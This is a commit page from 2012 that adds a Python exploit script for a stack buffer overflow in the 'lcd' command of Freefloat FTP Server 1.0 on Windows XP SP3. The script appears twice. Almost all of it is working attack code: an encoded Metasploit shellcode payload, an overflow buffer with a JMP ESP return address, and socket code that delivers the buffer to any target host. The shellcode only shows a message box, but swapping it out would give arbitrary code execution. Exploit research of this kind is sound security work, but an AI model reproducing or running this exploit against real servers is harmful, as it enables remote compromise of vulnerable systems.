synap5e · November 9, 2012 23:52
diff --git a/freefloat_ftp_1_lcd_exploit.py b/freefloat_ftp_1_lcd_exploit.py
 import sys, socket, struct
 
 # Freefloat FTP Server - "lcd" command stack overflow
 # Version 1.0 - DEP + ASLR disabled
 # Tested: Windows XP SP3 - English
 # Author: Simon Pinfold
 
 
 #
 # windows/messagebox - 287 bytes
 # http://www.metasploit.com
 # Encoder: x86/shikata_ga_nai
 # VERBOSE=false, EXITFUNC=process, TITLE=Check, TEXT=Code
 # Execution!, ICON=NO
 # Badchars = '\x00\x0a\x0d'
 #
 payload = ( "\xbb\x5c\x96\xd6\x1f\xd9\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
 "\x42\x31\x5e\x13\x83\xc6\x04\x03\x5e\x53\x74\x23\xc6\x80\xe3"
 "\x15\x8d\x72\xe0\x97\xbc\xc8\x7f\xe9\x89\x48\x0b\x78\x3a\x1b"
 "\x7d\x77\xb1\x6d\x9e\x0c\x83\x99\x15\x6c\x2c\x12\x1f\xa9\x63"
 "\x3c\x15\x3a\x22\x3d\x04\x43\x34\x5d\x2d\xd0\x93\xb9\xba\x6c"
 "\xe0\x4a\xe8\x46\x60\x4d\xfb\x1c\xda\x55\x70\x78\xfb\x64\x6d"
 "\x9e\xcf\x2f\xfa\x55\xbb\xae\x12\xa4\x44\x81\x2a\x3b\x16\x65"
 "\x6a\xb0\x60\xa4\xa4\x34\x6e\xe1\xd0\xb3\x4b\x91\x02\x14\xd9"
 "\x88\xc0\x3e\x05\x4b\x3c\xd8\xce\x47\x89\xae\x8b\x4b\x0c\x5a"
 "\xa0\x77\x85\x9d\x5f\xfe\xdd\xb9\x83\x61\x1d\x73\xb3\x48\x75"
 "\xfd\x21\x03\xb7\x96\x27\x5d\x36\x8b\x6a\x89\xd9\xac\x74\xb6"
 "\x6f\x17\x8f\xf3\x0e\x40\x6d\x70\x68\x6c\x56\x24\x9e\x03\x69"
 "\x37\xa1\x95\xd3\xcf\x36\xca\xb7\xef\x87\x7a\x7b\xdd\x29\x1f"
 "\x13\x54\x45\xba\x91\x1e\xf5\x60\x5c\x97\xe0\x3f\x9f\xf2\xe8"
 "\x36\x9d\xac\x4b\xe0\x80\x01\x10\x76\xd8\xbd\x3a\x91\x80\x42"
 "\x45\x9e\x2b\xd7\xe2\x41\x8c\x4f\x50\xea\xa9\xec\x67\x31\xb9"
 "\xae\xa3\xc0\x33\xad\xc4\xa5\x2d\x10\x4d\x52\xd1\x27\x19\xcb"
 "\x7d\xe7\xa4\x73\x1b\x8f\x65\xeb\x87\x2a\x5b\x3a\xcf\xf8\xbf"
 "\xb3\x59\xe1\xf1\x19\x33\xd1\xa2\xcc\x96\xee\x95\xde\xd6\x40"
 "\xe9\x74\xdf" )
 
 
 buffer = "lcd "
 buffer += "A" * 247
 buffer += struct.pack('<I', 0x7C9D30D7) # EIP overwritten here # JMP ESP  [SHELL32.dll]
 
 buffer += "B" * 8 # junk
 buffer += "\x90" * 32 # getpc shellcode corruption
 buffer += payload # 611 bytes max
 
 buffer += "C" * (1000 - len(buffer))
 buffer += "\r\n"
 
 print '[*] connecting to %s:%d' % (sys.argv[1], 21)
 conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 conn.connect((sys.argv[1], 21))
 print '[*] sending exploit'
 conn.send(buffer)
 print conn.recv(1024)
 conn.close()
 print '[*] done'
	import sys, socket, struct

	# Freefloat FTP Server - "lcd" command stack overflow
	# Version 1.0 - DEP + ASLR disabled
	# Tested: Windows XP SP3 - English
	# Author: Simon Pinfold


	#
	# windows/messagebox - 287 bytes
	# http://www.metasploit.com
	# Encoder: x86/shikata_ga_nai
	# VERBOSE=false, EXITFUNC=process, TITLE=Check, TEXT=Code
	# Execution!, ICON=NO
	# Badchars = '\x00\x0a\x0d'
	#
	payload = ( "\xbb\x5c\x96\xd6\x1f\xd9\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
	"\x42\x31\x5e\x13\x83\xc6\x04\x03\x5e\x53\x74\x23\xc6\x80\xe3"
	"\x15\x8d\x72\xe0\x97\xbc\xc8\x7f\xe9\x89\x48\x0b\x78\x3a\x1b"
	"\x7d\x77\xb1\x6d\x9e\x0c\x83\x99\x15\x6c\x2c\x12\x1f\xa9\x63"
	"\x3c\x15\x3a\x22\x3d\x04\x43\x34\x5d\x2d\xd0\x93\xb9\xba\x6c"
	"\xe0\x4a\xe8\x46\x60\x4d\xfb\x1c\xda\x55\x70\x78\xfb\x64\x6d"
	"\x9e\xcf\x2f\xfa\x55\xbb\xae\x12\xa4\x44\x81\x2a\x3b\x16\x65"
	"\x6a\xb0\x60\xa4\xa4\x34\x6e\xe1\xd0\xb3\x4b\x91\x02\x14\xd9"
	"\x88\xc0\x3e\x05\x4b\x3c\xd8\xce\x47\x89\xae\x8b\x4b\x0c\x5a"
	"\xa0\x77\x85\x9d\x5f\xfe\xdd\xb9\x83\x61\x1d\x73\xb3\x48\x75"
	"\xfd\x21\x03\xb7\x96\x27\x5d\x36\x8b\x6a\x89\xd9\xac\x74\xb6"
	"\x6f\x17\x8f\xf3\x0e\x40\x6d\x70\x68\x6c\x56\x24\x9e\x03\x69"
	"\x37\xa1\x95\xd3\xcf\x36\xca\xb7\xef\x87\x7a\x7b\xdd\x29\x1f"
	"\x13\x54\x45\xba\x91\x1e\xf5\x60\x5c\x97\xe0\x3f\x9f\xf2\xe8"
	"\x36\x9d\xac\x4b\xe0\x80\x01\x10\x76\xd8\xbd\x3a\x91\x80\x42"
	"\x45\x9e\x2b\xd7\xe2\x41\x8c\x4f\x50\xea\xa9\xec\x67\x31\xb9"
	"\xae\xa3\xc0\x33\xad\xc4\xa5\x2d\x10\x4d\x52\xd1\x27\x19\xcb"
	"\x7d\xe7\xa4\x73\x1b\x8f\x65\xeb\x87\x2a\x5b\x3a\xcf\xf8\xbf"
	"\xb3\x59\xe1\xf1\x19\x33\xd1\xa2\xcc\x96\xee\x95\xde\xd6\x40"
	"\xe9\x74\xdf" )


	buffer = "lcd "
	buffer += "A" * 247
	buffer += struct.pack('<I', 0x7C9D30D7) # EIP overwritten here # JMP ESP [SHELL32.dll]

	buffer += "B" * 8 # junk
	buffer += "\x90" * 32 # getpc shellcode corruption
	buffer += payload # 611 bytes max

	buffer += "C" * (1000 - len(buffer))
	buffer += "\r\n"

	print '[*] connecting to %s:%d' % (sys.argv[1], 21)
	conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	conn.connect((sys.argv[1], 21))
	print '[*] sending exploit'
	conn.send(buffer)
	print conn.recv(1024)
	conn.close()
	print '[*] done'